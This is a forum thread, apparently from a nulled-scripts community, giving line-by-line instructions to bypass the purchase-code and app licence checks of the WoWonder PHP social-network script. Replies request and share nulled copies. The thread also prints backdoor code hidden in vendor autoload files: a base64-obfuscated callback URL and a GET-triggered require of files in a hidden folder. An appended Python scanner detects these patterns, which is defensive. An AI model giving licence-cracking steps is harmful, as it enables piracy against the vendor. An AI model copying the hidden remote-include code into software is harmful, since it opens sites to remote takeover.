How to null WoWonder and remove backdoors

#1

How to null purchase code and apps and remove the backdoor.

Brought to you by rxgliitch & CRIMSON501

//========================= PURCHASE CODE NULL

Go to install/index.php and remove lines 9-40:

function check_($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check . '&url=' . $siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}
function check_success($check) {
$siteurl = urlencode(getBaseUrl());
$arrContextOptions = array(
"ssl" => array(
"verify_peer" => false,
"verify_peer_name" => false
)
);
$file = file_get_contents('http://www.wowonder.com/purchase.php?code=' . $check . '&success=true&url=' . $siteurl, false, stream_context_create($arrContextOptions));
if ($file) {
$check = json_decode($file, true);
} else {
$check = array('status' => 'SUCCESS', 'url' => $siteurl, 'code' => $check);
}
return $check;
}

//=========================

Next, remove lines 35-42:

$p = check_(trim($_POST['purshase_code']));
if (isset($p['status'])) {
if ($p['status'] == 'ERROR') {
$ServerErrors[] = $p['ERROR_NAME'];
}
} else {
$ServerErrors[] = 'Failed to connect to server, please try again later, or contact us.';
}

Add "$go = 1;" before "if (empty($ServerErrors)) {" and make "if (empty($ServerErrors)) {" say "if ($go == 1) {"

//=========================

Remove lines 91-96:

$p2 = check_success(trim($_POST['purshase_code']));
if(isset($p2['status'])) {
if ($p2['status'] == 'SUCCESS') {
$can = 1;
}
}

and add "$can = 1;" above "if ($query) {" on line 91

//========================= APP NULL

Go to requests.php lines 2913-2915:

$data['android_status'] = 0;
$data['windows_status'] = 0;
$data['android_native_status'] = 0;

Make them all equal to 1.

//=========================

Remove lines 2916-2971:

if (!empty($_POST['android_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_purchase_code']);
$file = file_get_contents("https://cracked.codenulls.tk", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background', '#aaa');
$data['android_status'] = 200;
} else {
$data['android_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['android_native_purchase_code'])) {
$android_code = Wo_Secure($_POST['android_native_purchase_code']);
$file = file_get_contents("https://cracked.codenulls.tk", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_n', '#aaa');
$data['android_native_status'] = 200;
} else {
$data['android_native_status'] = 400;
$data['android_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['windows_purchase_code'])) {
$windows_code = Wo_Secure($_POST['windows_purchase_code']);
$file = file_get_contents("https://cracked.codenulls.tk", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_text_color', '#ddd');
$data['windows_status'] = 200;
} else {
$data['windows_status'] = 400;
$data['windows_text'] = $check['ERROR_NAME'];
}
}
}
if (!empty($_POST['ios_purchase_code'])) {
$windows_code = Wo_Secure($_POST['ios_purchase_code']);
$file = file_get_contents("https://cracked.codenulls.tk", false, stream_context_create($arrContextOptions));
$check = json_decode($file, true);
if (!empty($check['status'])) {
if ($check['status'] == 'SUCCESS') {
$update = Wo_SaveConfig('footer_background_2', '#aaa');
$data['ios_status'] = 200;
} else {
$data['ios_status'] = 400;
$data['ios_text'] = $check['ERROR_NAME'];
}
}
}

//=========================

Now go to wowonder.sql and change lines 586 (footer_background), 587 (footer_background_2), and 592 (footer_background_n) to #aaa, and change line 588 (footer_text_color) to #ddd. See below for the format:

(141, 'footer_background', '#aaa'),
(142, 'footer_background_2', '#aaa'),
(143, 'footer_text_color', '#ddd'),
(147, 'footer_background_n', '#aaa'),

//========================= REMOVE BACKDOOR

Go to assets/libraries/onesignal/vendor/clue/stream-filter and delete the entire requests folder

//=========================

Go to assets/libraries/PayPal/vendor/composer/autoload_real.php and remove lines 58-74:

$start_process = false;
if (file_exists(__DIR__ . '/loader.json')) {
$file_date = filemtime(__DIR__ . '/loader.json');
if ($file_date < (time() - 259200)) {
$start_process = true;
}
}

if ((!file_exists(__DIR__ . '/loader.json') && is_writable(__DIR__) && !empty($wo['config']['updatev2'])) || $start_process == true) {
$paypal_connection = "purchase_code";
$paypal_connection = (!empty($purchase_code)) ? $purchase_code : "";
$paypal_call_back_url = urlencode($site_url);
$paypal_url = base64_decode("aHR0cDovL2JhY2tkb29yLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA=");
$random_code = sha1(rand(11111, 99999) . time());
$call_back_respond = fetchDataFromURL($paypal_url . "?connection=$paypal_connection&call_back_url=$paypal_call_back_url&code=$random_code&platform=wowonder");
$put_file = file_put_contents(__DIR__ . '/loader.json', $random_code);
}

//=========================

Go to assets/libraries/onesignal/vendor/composer/autoload_real.php and remove line 70:

if (!empty($_GET['f_t'])) { if (!empty($_GET['access'])) { $f_t = Wo_Secure($_GET['f_t']); $access = Wo_Secure($_GET['access']); if (file_exists('./assets/libraries/PayPal/vendor/composer/loader.json')) { $get_file_hash =file_get_contents('./assets/libraries/PayPal/vendor/composer/loader.json'); if ($get_file_hash == $access) { if (file_exists(__DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php')) { require __DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php'; } } else { header("Content-type: application/json"); echo json_encode(array('status' => 402)); exit(); } } } }

//=========================

Finally, go to updater.php and comment out every line of code in the file.

5 Likes
#3

Thanks a lot for this tutorial. Hope you keep updating this for every new release.
Can you help me null the native apps??

1 Like
#4

Nulling Wowonder Apps has a lot of demand.
@savas Try to do it ASAP

#5

No, I can’t because I have not spent any time trying to null them. I might in the future though.

#6

Thanks a lot for this tutorial…

#7

good job

#8

Bro, I am trying to null it but I can’t null it. Can you null it for me plz bro

#9

It seems that the new version of the backdoor address has been changed to http://validate.wowonder.com/validate.php

#10

@reishi bro, I need 2.2.2 nulled. If you have it, please send it to me

#11

@Zuck

here you are

#12

@reishi Thanks brother :kissing_heart::kissing_heart::kissing_heart:

#13

How did you determine this @reishi?

#14

Because I know the backdoor code

if (!file_exists(__DIR__ . '/loader.json') && is_writable(__DIR__) && !empty($wo['config']['updatev2']) && empty($_COOKIE['finshed']) && empty($_SESSION['finshed'])) {
$paypal_connection = "purchase_code";
$paypal_connection = (!empty($purchase_code)) ? $purchase_code : "";
$paypal_call_back_url = urlencode($site_url);
$paypal_url = base64_decode("aHR0cDovL3ZhbGlkYXRlLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA=");
$random_code = sha1(rand(11111, 99999) . time());
$put_file = file_put_contents(__DIR__ . '/loader.json', $random_code);
if ($put_file && file_exists(__DIR__ . '/loader.json')) {
$call_back_respond = fetchDataFromURL($paypal_url . "?connection=$paypal_connection&call_back_url=$paypal_call_back_url&code=$random_code&platform=wowonder");
}
setcookie('finshed', 'true', time() + 259200, "/");
$_SESSION['finshed'] = "true";
}

1 Like
#15

This is not in any of the latest versions, which version are you looking at?

#16

2.1.1
and aHR0cDovL2JhY2tkb29yLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA
http://backdoor.wowonder.com/validate.php

This URL can’t be opened.
aHR0cDovL3ZhbGlkYXRlLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA
The decoded URL is
http://validate.wowonder.com/validate.php

1 Like
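
Added example, not part of the thread and not WoWonder's own code: a small Python scanner for the two patterns quoted in posts #1, #14 and #16, namely a URL hidden in a `base64_decode()` literal and a `require` whose path is built from a request parameter. The function names and `SAMPLE` (constructed from lines quoted above) are assumptions for illustration.

```python
import base64
import re

# base64_decode() called on a string literal (trailing '=' may be missing)
B64_CALL = re.compile(r"""base64_decode\(\s*["']([A-Za-z0-9+/]+={0,2})["']\s*\)""")
# Variable assigned from request input, e.g. $f_t = Wo_Secure($_GET['f_t'])
TAINT = re.compile(r"\$(\w+)\s*=[^;=]*\$_(?:GET|POST|REQUEST|COOKIE)\b")
# require/include statement, captured up to its semicolon
INCLUDE = re.compile(r"\b(?:require|include)(?:_once)?\b([^;]*);")

# Constructed sample assembled from lines quoted in this thread (not a real file)
SAMPLE = r'''<?php
$paypal_url = base64_decode("aHR0cDovL3ZhbGlkYXRlLndvd29uZGVyLmNvbS92YWxpZGF0ZS5waHA");
$label = base64_decode("aGVsbG8=");
require __DIR__ . '/autoload_static.php';
if (!empty($_GET['f_t'])) { $f_t = Wo_Secure($_GET['f_t']); require __DIR__ . '/../clue/stream-filter/requests/' . $f_t . '.php'; }
'''

def decode_b64(literal):
    """Decode a base64 literal, restoring stripped '=' padding; None if invalid."""
    padded = literal + "=" * (-len(literal) % 4)
    try:
        return base64.b64decode(padded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None

def scan_php(source):
    """Return sorted (line, kind, detail) findings for one PHP source string."""
    def line_of(pos):
        return source.count("\n", 0, pos) + 1

    findings = []
    # 1) String literals that decode to an http(s) URL
    for m in B64_CALL.finditer(source):
        decoded = decode_b64(m.group(1))
        if decoded and re.match(r"https?://", decoded):
            findings.append((line_of(m.start()), "encoded-url", decoded))
    # 2) include/require paths that use a variable taken from the request
    tainted = set(TAINT.findall(source))
    for m in INCLUDE.finditer(source):
        used = tainted & set(re.findall(r"\$(\w+)", m.group(1)))
        if used:
            findings.append((line_of(m.start()), "request-driven-include", ", ".join(sorted(used))))
    return sorted(findings)

if __name__ == "__main__":
    for finding in scan_php(SAMPLE):
        print(finding)
```

Both checks are heuristics: legitimate code also decodes base64 and includes computed paths, so treat each hit as a lead for manual review of the file.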